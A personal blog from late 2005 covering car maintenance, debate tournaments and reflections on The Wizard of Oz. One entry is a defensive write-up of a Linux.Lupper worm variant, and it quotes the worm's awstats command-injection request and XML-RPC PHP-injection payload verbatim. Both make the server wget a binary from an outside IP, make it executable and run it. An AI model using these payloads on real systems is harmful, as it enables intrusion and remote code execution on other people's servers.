November 21st, 2005

On the first frigid cold night of the autumn, on the highway just south of I-240, Intrigue clicked on that magic sixth digit in its odometer, and my little baby is now all grown up. In celebration of its coming-of-age, I stole several hours of Charles Brodt's time and learned a little more about how to change brake pads. Though nothing ever quite works as planned, this little adventure only required two trips to Auto Zone, and one to the hardware store to fix a guide pin. My huge thanks to the Brodt family for helping me out with this, and to Gramma for getting me a car that could make it to 100k miles plus. Next on the car-genda: another oil change.

That started out kind of like The Gambler.

On our way up to the high school debate tournament in Stillwater, CB and I saw a Girls Gone Wild bus at the local Mardi Gras club. I've never want to go anywhere less than I want to go to that club now.

The tournament itself was a blast. I only judged one round, but I got to see various people I hadn't for quite some time, like Rasoul showing off pictures of his hundreds and hundreds of Star Wars figures, and Jennie, being her cute wonderful self. Andes Mint pie is never so good as when you eat it in joyful company.

My condolences and thoughts to David and family.

Yay sleep! All in one night, I dreamed that I was tooling around Stillwater with Jennie (in a truck, as usual), bought a house with a huge backyard I hadn't gotten around to actually seeing yet, and rode a horse around Norman. I still don't believe in Freudian dream analysis, as my dreams have always seemed pretty random, and large scale interpretation has been historically fraught with peril. This has the side-effects of making me scared to base religion solely on the all-too-arbitrary Biblical interpretation, and making Lacan, of course, far less compelling.

November 14th, 2005

This, with an average of three interpersonal crises per night, continues as the single most drama-filled November on record.

Last night, I caught the last few minutes of The Wizard of Oz on TV down in Norman-town. I had forgotten how many good little lessons exist in the latter bits of that movie: our "always already" worthy, caring, intelligent, and courageous selves; the greatest adventures of life happening in our own backyards; and the ultimate failure of technology to accomplish what magic can. I'm reminded of "Grandma" Lana's office at her house, filled with Oz and Oz-associated memorabilia. I should wander through there again.

Does every womun think that Glinda was some sort of perfect example of feminine beauty? This seems objectively wrong to me, but is a belief shared by both my mother and at least one member of the younger generation.

The Wicked Witch of the West is only powerful inasmuch as we believe that she is powerful. For all the terrible things that she says to Dorothy, the Witch's power is only effective when coupled with Dorothy's capacity to believe that what the Witch says is true (also through flying monkeys, but that's not germane to the point). Thus, if Dorothy is capable of believing that the Witch has far less ability to constitute her identity than she herself does, she is able to overcome the Witch's fearful and deprecating tactics, and melt her. People need to learn this. Bullies, and those others that comment obnoxiously, are ultimately powerless unless we are willing to believe them. That doesn't absolve responsibility not to try to convince people that they are anything but unique and positive additions to the world, but it does remove the ability to blame the world at large for denying one any chance at all to have self esteem. It also creates a responsibility not to respond with the same kind of juvenile behavior, as that is simply abjuring the moral high ground that gives you a foundation for disbelieving the Witch to begin with, along with giving credence to the notion that wickedness is an appropriate way to play the game. The Witch is not so powerful that you should just lie down in the poppy field and give up on ever seeing Aunt Em and Uncle Henry again, or try to use black magic to posit yourself as an even more wicked kind of witch.

The magical powers of ice cream to make the world just a little better are matched only by silver or ruby shoes. Egg nog ice cream is here! I'm feeling more Christmas-y already. All I need now is to go on a nog run with Blake and/or Heather.

Bare-knuckle boxing with Patrick late at night has left me sore like I'm bruised, but with none of the discoloration.

I need to return Mike's call, but I'm trying to wait until I have "substantial time" that I can devote to answering whatever questions he was referencing in his voicemail.

Dinner tonight! Let the drama continue!

"Why, as for that," answered Oz, "I think you are wrong to want a heart. It makes most people unhappy. If you only knew it, you are in luck not to have a heart."
"That must be a matter of opinion," said the Tin Woodman. "For my part, I will bear all the unhappiness without a murmur, if you will give me the heart."

November 11th, 2005

Sorry about the site(s) being down yesterday. A hard drive crash on the computer that connects the website to the Internet is to blame. At least it wasn't another worm.

Oddness this week included the obvious computer problems, two increasingly awkward situations with the girlies, drama between three sets of friends, an old friend getting the axe, and the beginning of a cough. It's going to be a long November, and seems to only be getting longer.

I'm never buying a Sony music CD again. Forcing your consumers to install a program that intentionally breaks the ability to secure their computer from any bad-hat piece of software that is bright enough to use the string "$sys$" in its name is the dumbest idea anywhere ever. I can't trust Sony not to break the machines that I use to play the music I buy from them, so I am going to have to go to more secure methods to get said music. I sure hope I keep it legal...

In the kind of purely self-centered vein that I promise I generally try to avoid, how much do people like to talk to me online? I've created a scoring system based on the size of some IM logs. The logs rolled over in July 2004, when I switched computers to come to Hertz. Scores before July '04:

  1. Denise: 695
  2. Jennie: 381
  3. Jessica Marlin: 142
  4. Bryan (my brother): 125

Then, from July '04 to the present:

  1. With a commanding lead, Denise: 853
  2. Leila: 411
  3. Chris Brodt: 288
  4. Lori: 188

Well, I never thought it'd come to this when I said: "Have another."
'Cause, baby, you turned into me, an' I became my mother.

Linux.Lupper varient called 'listen'

November 8th, 2005

At 1:45 this morning, Server Prime was compromised by a varient of the Linux.Lupper worm called 'listen.' There's not a lot of information out there on this, so I'll try to share what I've found.

I was attacked by server1.infinityclan.com, at That IP has been banned. I have also patched XML_RPC (again).

The worm exists as '/tmp/listen', a 443300 byte file with an md5sum of:
0a32167712a63f7a6ad73d12611006f2 listen

The worm tries to spread in 2 ways: by using an old awstats exploit, and the newer forms of the XML_RPC vulnerabilities. Specifically, for the awstats vuln, it sends the string:
GET %sawstats.pl?configdir=|echo;echo%%20YYY;cd%%20%%2ftmp%%3bwget%%2024%%2e224%%2e174%%2e18%%2flisten%%3bchmod%%20%%2bx%%20listen%%3b%%2e%%2flisten%%20216%%2e102%%2e212%%2e115;echo%%20YYY;echo| HTTP/1.1
to each of the directories

in an attempt to download itself.

The second part posts the XML call:
<?xml version="1.0"?><methodCall><methodName>test.method</methodName><params><param><value><name>',''));echo '_begin_';echo `cd /tmp;wget;chmod +x listen;./listen `;echo '_end_';exit;/*</name></value></param></params></methodCall>
to a series of applications (including b2evolution) to try to download itself. You can see what it's doing a little more clearly in the XML.

I have already blocked all access to and from You probably should too.

Once the program is downloaded to /tmp and run, it creates a file called listen.log where it puts some small amount of system info, and starts making a bunch of outbound connections to a series of IP addresses, probably either randomly selected, or with a callback to get a list before it starts. I didn't notice the worm until after it had begun, and have not done a full disassemble of the code, so I can't tell you for sure. Suspiciously, the IPs and appear hard-coded, so those might be controlling addresses.

Strings from the binary are below, as are log entries.

The calendar determines my mood

November 7th, 2005

The UCO tournament was quite entertaining. I got to judge some of the better novice rounds (and some of the not-so-good ones) I've seen in quite a while, and OU had some good successes. Congrats to Conor and Blake, of course, and also to Laura and Dustin for being the second OU team to take 1st in JV while dropping only 1 ballot. Do that twice more, and I'll be really impressed.

Similar happy feelings toward the UCO kids (specifically Avery) for giving me something to do in the evening time, and a place to stay. Crashing random birthday parties at nice Chinese restaurants can be a lot of fun, even as the driver (a role I'm trying to fall back into).

One can go through and find certain cyclical patterns to their life. A really obvious one presents itself to me with the calendar. There are certain months of the year that have historically been the cause of drama, and certain months that always seem to go well. February is generally a very happy month, as is May. March tends to be troubling, but not so much that I can't function. September is usually the start of at least one big problem. The biggest difficulties I generally have to face in a year, though, tend to start sometime in the last 2 days of October, and continue cropping up right into the first 2 days of December. These are not easy things to deal with either. Less like "bad grade on a test" or "car gets a flat tire." Those are problems for other months. November touts personal statements much more like "wife leaves you" or "realize that Grandpa is really not going to get better." Looking back, I haven't had a happy/easy November since...1997-ish, which seems much longer when I describe it as 1/3 of my total Novembers. Even that one only gets counted because I don't remember anything specifically bad happening that year.

How do I know that people understand me?

[15:23] neisy888: and how is today?
[15:23] YouAreMy7thSeal: oh wow
[15:25] neisy888: oh it's november
[15:25] neisy888: isn't it?
[15:25] YouAreMy7thSeal: it sure is

Good ole' Neisy.